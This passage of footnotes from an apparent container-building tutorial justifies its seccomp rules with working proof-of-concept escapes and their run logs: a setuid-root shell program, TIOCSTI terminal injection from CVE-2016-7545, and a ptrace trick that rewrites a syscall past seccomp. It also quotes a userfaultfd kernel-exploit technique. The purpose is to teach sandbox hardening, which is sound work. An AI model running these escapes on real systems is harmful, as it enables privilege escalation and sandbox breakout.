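    target = os.path.realpath(os.path.join(root, member_name))
    if target == root or target.startswith(root + os.sep):
        return target
    return None

with tempfile.TemporaryDirectory() as root:
    # A hostile symlink, as if an earlier archive member had created it.
    os.symlink("/", os.path.join(root, "escape"))
    print(safe_destination(root, "usr/bin/tool") is not None)   # True
    print(safe_destination(root, "../outside"))                 # None
    print(safe_destination(root, "escape/etc/cron.d/job"))      # None
```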

⁴⁷

The Docker seccomp policy doesn't include an explicit blacklist, which makes it a little hard to follow, so I wrote some code to derive one.

    #!/usr/bin/env python3

    import gzip
    import requests
    import re
    import sys

    url = "https://raw.githubusercontent.com/docker/docker/5ff21add06ce0e502b41a194077daad311901996/profiles/seccomp/default.json"

    conditional = set()
    allowed = set()
    disallowed = set()

    for entry in requests.get(url).json()["syscalls"]:
        if entry["args"]:
            conditional |= set(entry["names"])
        else:
            allowed |= set(entry["names"])

    manpage = "/usr/share/man/man2/syscalls.2.gz"

    with gzip.open(manpage, "r") as f:
        ready = False
        for _line in f:
            line = _line.decode("utf-8")
            # table end
            if ready and line == ".TE\n":
                break
            match = re.match(r"\\fB(.+?)\\fP(.+)", line)
            if match:
                if match.group(1) == "System call":
                    ready = True
                elif (match.group(1) not in allowed
                      and match.group(1) not in conditional):
                    disallowed.add(match.group(1))

    print("Conditionally allowed:")
    for c in sorted(conditional):
        sys.stdout.write("~%s~, " % c)
    print("\n\nDisallowed:")
    for d in sorted(disallowed):
        sys.stdout.write("~%s~, " % d)
    sys.stdout.write("\n")

Conditionally allowed: clone, personality,

Disallowed: _sysctl, add_key, alloc_hugepages, bdflush, clock_adjtime, clock_settime, create_module, free_hugepages, get_kernel_syms, get_mempolicy, getpagesize, kern_features, kexec_file_load, kexec_load, keyctl, mbind, migrate_pages, move_pages, nfsservctl, nice, oldfstat, oldlstat, oldolduname, oldstat, olduname, pciconfig_iobase, pciconfig_read, pciconfig_write, perfctr, perfmonctl, pivot_root, ppc_rtas, preadv2, pwritev2, quotactl, readdir, request_key, set_mempolicy, setup, sgetmask, sigaction, signal, sigpending, sigprocmask, sigsuspend, spu_create, spu_run, ssetmask, subpage_prot, swapoff, swapon, sync_file_range2, sysfs, uselib, userfaultfd, ustat, utrap_install, vm86, vm86old

⁴⁸

Listing 114: self_setuid.c

/* -*- compile-command: "gcc -Wall -Werror -static self_setuid.c -o self_setuid" -*- */
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main (int argc, char **argv)
{
	if (argc == 2 && !strcmp(argv[1], "shell")) {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ setresuid(0, 0, 0) failed: %m\n");
			return 1;
		}
		return system("sh");
	} else {
		if (chown(argv[0], 0, 0)) {
			fprintf(stderr, "++ chown failed: %m\n");
			return 1;
		}
		int self_fd = -1;
		/* open() returns -1 on failure, not 0 */
		if ((self_fd = open(argv[0], O_RDONLY)) < 0) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		if (chmod(argv[0], S_ISUID | S_IXOTH)
		    && fchmod(self_fd, S_ISUID | S_IXOTH)
		    && fchmodat(AT_FDCWD, argv[0], S_ISUID | S_IXOTH, 0)) {
			fprintf(stderr, "++ chmod  / fchmod / fchmodat failed: %m\n");
			close(self_fd);
			return 1;
		}
		close(self_fd);
		return 0;
	}
}

Listing 115: allow_chmod.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b471a69 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -151,18 +151,6 @@ int syscalls()
 	scmp_filter_ctx ctx = NULL;
 	fprintf(stderr, "=> filtering syscalls...");
 	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,

[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EXwjdL...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ chmod / fchmod / fchmodat failed:
Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$sudo ./contained.allow_chmod -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.35HO0W...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$./self_setuid shell
sh-4.3#whoami
root
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$rm ./self_setuid

⁴⁹

I heard about this pretty recently because of CVE-2016-7545, an SELinux bug:

Listing 118: CVE-2016-7545 -- SELinux sandbox escape from Federico Bento

Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
     char *cmd = "id\n";
     while(*cmd)
      ioctl(0, TIOCSTI, cmd++);
     execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.

Listing 119: tiocsti.c

/* -*- compile-command: "gcc -Wall -Werror -static tiocsti.c -o tiocsti" -*- */
/* adapted from http://www.openwall.com/lists/oss-security/2016/09/25/1 */
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>

int main()
{
     for (char *cmd = "id\n"; *cmd; cmd++) {
	     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
	     }
     }
     return 0;
}

Listing 120: allow_tiocsti.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..5fb25bd 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -167,8 +167,6 @@ int syscalls()
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.P5QATt...done.
=> trying a user namespace...writing /proc/1819/uid_map...writing
/proc/1819/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ ioctl failed: Operation not
permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_tiocsti -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.J9mulv...done.
=> trying a user namespace...writing /proc/1865/uid_map...writing
/proc/1865/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
id
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ uid=1000(lizzie) gid=1000(lizzie) groups=1000(lizzie)

⁵⁰

There's a notion of "user keyrings", which I believe are user-namespaced, but that's it.

Listing 122: man 7 keyrings

	User keyrings
		Each UID known to the kernel has a record that contains
		two  keyrings: The  user keyring  and the  user session
		keyring.  These exist for as  long as the UID record in
		the  kernel exists.   A  link to  the  user keyring  is
		placed in a  new session keyring by  pam_keyinit when a
		new login session is initiated.

⁵¹

man 2 seccomp says:

The seccomp check will not be run again after the tracer is notified. (This means that seccomp-based sandboxes must not allow use of ptrace(2)–even of other sandboxed processes–without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)

Here's an example (remember that our seccomp profile should prevent chmod(x, S_ISUID)):

Listing 124: ptrace_breaks_seccomp.c

/* -*- compile-command: "gcc -Wall -Werror -static ptrace_breaks_seccomp.c -o ptrace_breaks_seccomp" -*- */
#include <sys/stat.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <unistd.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stddef.h>
#include <sys/syscall.h>

#define MAGIC_SYSCALL 666

int main (int argc, char **argv)
{
	pid_t child = 0;
	switch ((child = fork())) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		fprintf(stderr, "++ child stopping itself.\n");
		if (kill(getpid(), SIGSTOP)) {
			fprintf(stderr, "++ kill failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ child continued\n");
		/* pick an arbitrary syscall number. our tracer will change it to chmod. */
		if (syscall(MAGIC_SYSCALL, argv[0], S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "++ chmod-via-MAGIC_SYSCALL failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ chmod succeeded, child finished.\n");
		break;
	default:;
		int status = 0;
		if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) {
			fprintf(stderr, "++ ptrace failed: %m\n");
			return 1;
		}
		waitpid(child, &status, 0);
		if (!(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP)) {
			fprintf(stderr, "++ expected SIGSTOP in child.\n");
			return 1;
		}
		struct user_regs_struct regs = {0};
		while (1) {
			if (ptrace(PTRACE_GETREGS, child, 0, &regs)) {
				fprintf(stderr, "++ getting child registers failed: %m\n");
				return 1;
			}
			if (!(regs.orig_rax == MAGIC_SYSCALL)) {
				if (ptrace(PTRACE_SYSCALL, child, 0, 0)) {
					fprintf(stderr, "++ continuing the process failed.\n");
					return 1;
				}
				waitpid(child, &status, 0);
				if (!WIFSTOPPED(status)) {
					fprintf(stderr, "++ expected a ptrace stop in child.\n");
					return 1;
				}
			} else {
				fprintf(stderr, "++ got MAGIC_SYSCALL!\n");
				regs.orig_rax = SYS_chmod;
				if (ptrace(PTRACE_SETREGS, child, 0, &regs)) {
					fprintf(stderr, "++ setting child registers failed: %m\n");
					return 1;
				}
				if (ptrace(PTRACE_CONT, child, 0, 0)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				break;
			}
		}
		waitpid(child, NULL, 0);
		fprintf(stderr, "++ finished waiting.\n");

		break;
	}
	return 0;
}

Listing 125: allow_ptrace.diff

diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 2291ecb..42ecbc6 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -173,7 +173,6 @@ int syscalls()
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EiZRVH...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ ptrace failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_ptrace -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ThyjKm...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ child continued
++ got MAGIC_SYSCALL!
++ chmod succeeded, child finished.
++ finished waiting.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ptrace_breaks_seccomp 
-rws------ 1 lizzie lizzie 793K Oct 11 14:55 ptrace_breaks_seccomp

This seems to have been fixed in June 2016 by Kees Cook:

Listing 126: run seccomp after ptrace on LKML

There has been a long-standing (and documented) issue with seccomp
where ptrace can be used to change a syscall out from under seccomp.
This is a problem for containers and other wider seccomp filtered
environments where ptrace needs to remain available, as it allows
for an escape of the seccomp filter.

Since the ptrace attack surface is available for any allowed syscall,
moving seccomp after ptrace doesn't increase the actually available
attack surface. And this actually improves tracing since, for
example, tracers will be notified of syscall entry before seccomp
sends a SIGSYS, which makes debugging filters much easier.

The per-architecture changes do make one (hopefully small)
semantic change, which is that since ptrace comes first, it may
request a syscall be skipped. Running seccomp after this doesn't
make sense, so if ptrace wants to skip a syscall, it will bail
out early similarly to how seccomp was. This means that skipped
syscalls will not be fed through audit, though that likely means
we're actually avoiding noise this way.

This series first cleans up seccomp to remove the now unneeded
two-phase entry, fixes the SECCOMP_RET_TRACE hole (same as the
ptrace hole above), and then reorders seccomp after ptrace on
each architecture.

Thanks,

-Kees

This patchset made it into the kernel at 4.8. See for example 93e35e:

  [lizzie@empress linux-stable]$ git branch --contains 93e35efb8de45393cf61ed07f7b407629bf698ea
  * linux-4.8.y
    master
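
Since the fix landed in 4.8, one could check the running kernel's release before deciding how much to worry about ptrace. A minimal sketch, assuming the release string from uname(2) starts with "major.minor" (both function names are made up for illustration). Distribution kernels may backport or omit patches, so the version number is only a hint; filtering ptrace regardless remains the conservative choice.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/utsname.h>

/* Hypothetical helper: returns 1 if a release string such as "4.8.4-1-ARCH"
 * is at least major.minor, 0 if it is older, -1 if it cannot be parsed. */
int release_at_least(const char *release, int major, int minor)
{
	int maj = 0, min = 0;
	assert(release != NULL);
	if (sscanf(release, "%d.%d", &maj, &min) != 2)
		return -1;
	return maj > major || (maj == major && min >= minor);
}

/* Returns 1 if the running kernel reports 4.8 or later, 0 if it reports
 * something older, -1 if uname fails or the release cannot be parsed. */
int seccomp_runs_after_ptrace(void)
{
	struct utsname host;
	if (uname(&host))
		return -1;
	return release_at_least(host.release, 4, 8);
}
```

For the two kernels in the logs above, release_at_least("4.7.6-1-ARCH", 4, 8) is 0 and release_at_least("4.8.4-1-ARCH", 4, 8) is 1.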

⁵²

This is, as far as I can tell, only documented in the kernel tree:

Listing 129: Documentation/vm/userfaultfd.txt@c8d2bc

= Userfaultfd =

== Objective ==

Userfaults allow the implementation of on-demand paging from userland
and more generally they allow userland to take control of various
memory page faults, something otherwise only the kernel code could do.

[...]

== API ==

When first opened the userfaultfd must be enabled invoking the
UFFDIO_API ioctl specifying a uffdio_api.api value set to UFFD_API (or
a later API version) which will specify the read/POLLIN protocol
userland intends to speak on the UFFD and the uffdio_api.features
userland requires. The UFFDIO_API ioctl if successful (i.e. if the
requested uffdio_api.api is spoken also by the running kernel and the
requested features are going to be enabled) will return into
uffdio_api.features and uffdio_api.ioctls two 64bit bitmasks of
respectively all the available features of the read(2) protocol and
the generic ioctl available.

Once the userfaultfd has been enabled the UFFDIO_REGISTER ioctl should
be invoked (if present in the returned uffdio_api.ioctls bitmask) to
register a memory range in the userfaultfd by setting the
uffdio_register structure accordingly. The uffdio_register.mode
bitmask will specify to the kernel which kind of faults to track for
the range (UFFDIO_REGISTER_MODE_MISSING would track missing
pages). The UFFDIO_REGISTER ioctl will return the
uffdio_register.ioctls bitmask of ioctls that are suitable to resolve
userfaults on the range registered. Not all ioctls will necessarily be
supported for all memory types depending on the underlying virtual
memory backend (anonymous memory vs tmpfs vs real filebacked
mappings).

Userland can use the uffdio_register.ioctls to manage the virtual
address space in the background (to add or potentially also remove
memory from the userfaultfd registered range). This means a userfault
could be triggering just before userland maps in the background the
user-faulted page.

The primary ioctl to resolve userfaults is UFFDIO_COPY. That
atomically copies a page into the userfault registered range and wakes
up the blocked userfaults (unless uffdio_copy.mode &
UFFDIO_COPY_MODE_DONTWAKE is set). Other ioctl works similarly to
UFFDIO_COPY. They're atomic as in guaranteeing that nothing can see an
half copied page since it'll keep userfaulting until the copy has
finished.
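
The handshake described in the first paragraph of the API section can be sketched as follows. This assumes kernel headers recent enough to provide SYS_userfaultfd and <linux/userfaultfd.h>; the function name is made up for illustration. On many systems the call is refused for unprivileged callers, or inside a seccomp sandbox that filters userfaultfd, so the sketch only reports the error rather than treating it as fatal.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: open a userfaultfd and enable it with UFFDIO_API.
 * Returns the file descriptor on success, or -errno on failure. */
int uffd_open_and_enable(void)
{
	/* There is no glibc wrapper assumed here, so go through syscall(2). */
	int fd = (int) syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	if (fd < 0)
		return -errno;

	struct uffdio_api api;
	memset(&api, 0, sizeof(api));
	api.api = UFFD_API;   /* the protocol version we intend to speak */
	api.features = 0;     /* request no optional features */
	if (ioctl(fd, UFFDIO_API, &api)) {
		int err = errno;
		close(fd);
		return -err;
	}
	/* On success the kernel has filled in api.features and api.ioctls. */
	return fd;
}
```

A caller would go on to UFFDIO_REGISTER a memory range on the returned descriptor, as the quoted documentation describes.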

⁵³

Jann Horn described this to me, and linked to his vulnerability and exploit:

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

It was also used by Vitaly Nikolenko in his proof-of-concept for CVE-2016-6187:

[…]

If we could overwrite the cleanup function pointer (remember that this object is now allocated in user space), then we'll have arbitrary code execution with CPL=0. The only problem is that subprocess_info object allocation and freeing happens on the same path. One way to modify the object's function pointer is to somehow suspend the execution before (*info->cleanup)(info) gets called and set the function pointer to our privilege escalation payload. I could have found other objects of the same size with two "separate" paths for allocation and function triggering but I needed a reason to try userfaultfd() and the page splitting idea.

The userfaultfd syscall can be used to handle page faults in user space. We can allocate a page in user space and set up a handler (as a separate thread); when this page is accessed either for reading or writing, execution will be transferred to the user-space handler to deal with the page fault. There's nothing new here and this was mentioned by Jann Horn

[…].

Allocate two consecutive pages, split the object over these two pages (as before) and set up the page handler for the second page.

When the user-space PF is triggered by memset, set up another user-space PF handler but for the first page.

The next user-space PF will be triggered when object variables (located in the first page) get initialised in call_usermodehelper_setup. At this point, set up another PF for the second page.

Finally, the last user-space PF handler can modify the cleanup function pointer (by setting it to our privilege escalation payload or a ROP chain) and set the path member to 0 (since these members are all located in the first page and already initialised).

Setting up user-space PF handlers for already "page-faulted" pages can be accomplished by munmapping/mapping these pages again and then passing them to userfaultfd(). The PoC for 4.5.1 can be found here. There's nothing specific to the kernel version though (it should work on all vulnerable kernels). There's no privilege escalation payload but the PoC will execute instructions at the user-space address 0xdeadbeef.

⁵⁴

Listing 131: man 2 perf_event_open

    PERF_EVENT_OPEN(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

    NAME
            perf_event_open - set up performance monitoring

    SYNOPSIS
            #include <linux/perf_event.h>
            #include <linux/hw_breakpoint.h>

            int perf_event_open(struct perf_event_attr *attr,
                                            pid_t pid, int cpu, int group_fd,
                                            unsigned long flags);

            Note: There  is no glibc  wrapper for this system  call; see
            NOTES.

    DESCRIPTION
            [...]

    Arguments

         The pid and cpu arguments allow specifying which process and
         CPU to monitor:

         pid == 0 and cpu == -1
                 This measures the calling process/thread on any CPU.

         pid == 0 and cpu >= 0
                 This  measures  the  calling process/thread  only  when
                 running on the specified CPU.

         pid > 0 and cpu == -1
                 This measures the specified process/thread on any CPU.

         pid > 0 and cpu >= 0
                 This  measures the  specified process/thread  only when
                 running on the specified CPU.

         pid == -1 and cpu >= 0
                 This  measures all  processes/threads on  the specified
                 CPU.   This  requires  CAP_SYS_ADMIN  capability  or  a
                 /proc/sys/kernel/perf_event_paranoid value of less than
                 1.

         pid == -1 and cpu == -1
                 This setting is invalid and will return an error.

If a pid is specified, the corresponding process is found within the namespace:

Listing 132: kernel/events/core.c:9376@c8d2bc

    /**
     * sys_perf_event_open - open a performance event, associate it to a task/cpu
     *
     * @attr_uptr:  event_id type attributes for monitoring/sampling
     * @pid:                target pid
     * @cpu:                target cpu
     * @group_fd:           group leader event fd
     */
    SYSCALL_DEFINE5(perf_event_open,
                    struct perf_event_attr __user *, attr_uptr,
                    pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
    {
            /* ... */

            if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
                    task = find_lively_task_by_vpid(pid);
                    if (IS_ERR(task)) {
                            err = PTR_ERR(task);
                            goto err_group_fd;
                    }
            }

            /* ... */
    }

Listing 133: kernel/events/core.c:3621@c8d2bc

    static struct task_struct *
    find_lively_task_by_vpid(pid_t vpid)
    {
            struct task_struct *task;

            rcu_read_lock();
            if (!vpid)
                    task = current;
            else
                    task = find_task_by_vpid(vpid);
            if (task)
                    get_task_struct(task);
            rcu_read_unlock();

            if (!task)
                    return ERR_PTR(-ESRCH);

            return task;
    }

Listing 134: kernel/pid.c:459@c8d2bc

    struct task_struct *find_task_by_vpid(pid_t vnr)
    {
            return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
    }

⁵⁵

The relevant commit is 0161028, whose commit message gives a good description of the problems:

commit 0161028b7c8aebef64194d3d73e43bc3b53b5c66
Author: Andy Lutomirski <redacted>
Date:   Mon May 9 15:48:51 2016 -0700

    perf/core: Change the default paranoia level to 2
    
    Allowing unprivileged kernel profiling lets any user dump follow kernel
    control flow and dump kernel registers.  This most likely allows trivial
    kASLR bypassing, and it may allow other mischief as well.  (Off the top
    of my head, the PERF_SAMPLE_REGS_INTR output during /dev/urandom reads
    could be quite interesting.)
    
    Signed-off-by: Andy Lutomirski <redacted>
    Acked-by: Kees Cook <redacted>
    Signed-off-by: Linus Torvalds <redacted>

diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
index 57653a4..fcddfd5 100644
--- a/Documentation/sysctl/kernel.txt
+++ b/Documentation/sysctl/kernel.txt
@@ -645,7 +645,7 @@ allowed to execute.
 perf_event_paranoid:
 
 Controls use of the performance events system by unprivileged
-users (without CAP_SYS_ADMIN).  The default value is 1.
+users (without CAP_SYS_ADMIN).  The default value is 2.
 
  -1: Allow use of (almost) all events by all users
 >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 4e2ebf6..c0ded24 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -351,7 +351,7 @@ static struct srcu_struct pmus_srcu;
  *   1 - disallow cpu events for unpriv
  *   2 - disallow kernel profiling for unpriv
  */
-int sysctl_perf_event_paranoid __read_mostly = 1;
+int sysctl_perf_event_paranoid __read_mostly = 2;
 
 /* Minimum for 512 kiB + 1 user control page */

This is included in 4.6:

[lizzie@empress linux]$ git tag --contains 0161028b7c8aebef64194d3d73e43bc3b53b5c66
v4.6
v4.7
v4.7-rc1
v4.7-rc2
v4.7-rc3
v4.7-rc4
v4.7-rc5
v4.7-rc6
v4.7-rc7
v4.8
v4.8-rc1
v4.8-rc2
v4.8-rc3
v4.8-rc4
v4.8-rc5
v4.8-rc6
v4.8-rc7
v4.8-rc8

Thanks to Jann Horn for pointing this out.
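
To see which default a given machine actually runs with, the level can be read back through /proc/sys. A minimal sketch; both function names are made up for illustration, and the threshold follows the kernel/events/core.c comment quoted above ("2 - disallow kernel profiling for unpriv").

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: read an integer sysctl from a /proc/sys path.
 * Returns 0 and stores the value in *out, or -1 on any failure. */
int read_int_sysctl(const char *path, int *out)
{
	assert(path != NULL && out != NULL);
	FILE *f = fopen(path, "r");
	if (!f)
		return -1;
	int ok = fscanf(f, "%d", out) == 1;
	fclose(f);
	return ok ? 0 : -1;
}

/* Level 2 is the first level that disallows kernel profiling for
 * unprivileged users, so anything below it still allows it. */
int unpriv_kernel_profiling_allowed(int paranoid_level)
{
	return paranoid_level < 2;
}
```

A caller would pass "/proc/sys/kernel/perf_event_paranoid" to read_int_sysctl and feed the result to unpriv_kernel_profiling_allowed; with the old default of 1 that returns true, and with the new default of 2 it returns false.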

⁵⁶

Documentation/prctl/no_new_privs.txt@c8d2bc

The execve system call can grant a newly-started program privileges that its parent did not have. The most obvious examples are setuid/setgid programs and file capabilities. […] Any task can set no_new_privs. Once the bit is set, it is inherited across fork, clone, and execve and cannot be unset. With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.
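
The "cannot be unset" part is easy to check from user space. A minimal sketch using prctl(2) directly (the function name is made up for illustration); note that running it permanently sets no_new_privs on the calling thread.

```c
#include <assert.h>
#include <errno.h>
#include <sys/prctl.h>

/* Sets no_new_privs on the calling thread, then tries to clear it.
 * Returns 1 if the bit is set and the attempt to clear it was refused,
 * 0 if the kernel behaved differently, -1 if the bit could not be set. */
int no_new_privs_is_sticky(void)
{
	if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
		return -1;
	/* There is no "unset" operation: only the value 1 is accepted. */
	int cleared = prctl(PR_SET_NO_NEW_PRIVS, 0, 0, 0, 0) == 0;
	int still_set = prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0) == 1;
	return !cleared && still_set;
}
```

Because the bit is inherited across fork, clone, and execve, every descendant of a process that has called this starts with it set.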

Listing 136: man 2 seccomp

		In order to  use the SECCOMP_SET_MODE_FILTER operation,
		either   the  caller   must   have  the   CAP_SYS_ADMIN
		capability in  its user  namespace, or the  thread must
		already have the no_new_privs bit set.  If that bit was
		not  already set  by an  ancestor of  this thread,  the
		thread must make the following call:

		    prctl(PR_SET_NO_NEW_PRIVS, 1);

